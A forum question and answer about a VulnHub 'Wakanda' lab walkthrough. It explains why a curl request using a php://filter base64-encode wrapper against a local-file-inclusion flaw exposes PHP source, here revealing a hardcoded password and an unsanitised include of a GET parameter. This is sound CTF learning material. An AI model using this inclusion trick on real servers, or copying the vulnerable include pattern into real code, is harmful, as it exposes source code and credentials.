curling with php base64 encoder/decoder instead of just curling .... why?

Question

Reading through the vulnhub walkthrough for wakanda here

https://medium.com/egghunter/wakanda-1-vulnhub-walkthrough-3d524ed8a372

And it uses a php filter i haven't seen before (base64 encoder) which is then decoded . Using this line of code

curl http://192.168.56.102/?lang=php://filter/convert.base64-encode/resource=index | head -n 1 | base64 -d

In comparison I tried to simply curl the page via

curl http://192.168.56.102/?lang=php

Both output the html , but the filtered code also produces several lines above the DOCTYPE header that is enclosed inside of a php tag. My question is why does this happen?

the significant output (first few lines) is below

<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>



<!DOCTYPE html>
<html lang="en"><head>

Obviously this is wrong, but it seems like the filtered code is: encoding , then decoding and somehow in that process getting more information than if we just curled everything

Answer 1

I came across this article

https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/

which explained this very well.

This forces PHP to base64 encode the file before it is used in the require statement. From this point its a matter of then decoding the base64 string to obtain the source code for the PHP files.

So as to why the filtered code gets all the html and the php, is because its making the php be encoded before grabbing the html and wrapping it all into one output string, which can then be decoded and read . Meaning as output you get both the page html and the php code from other supporting files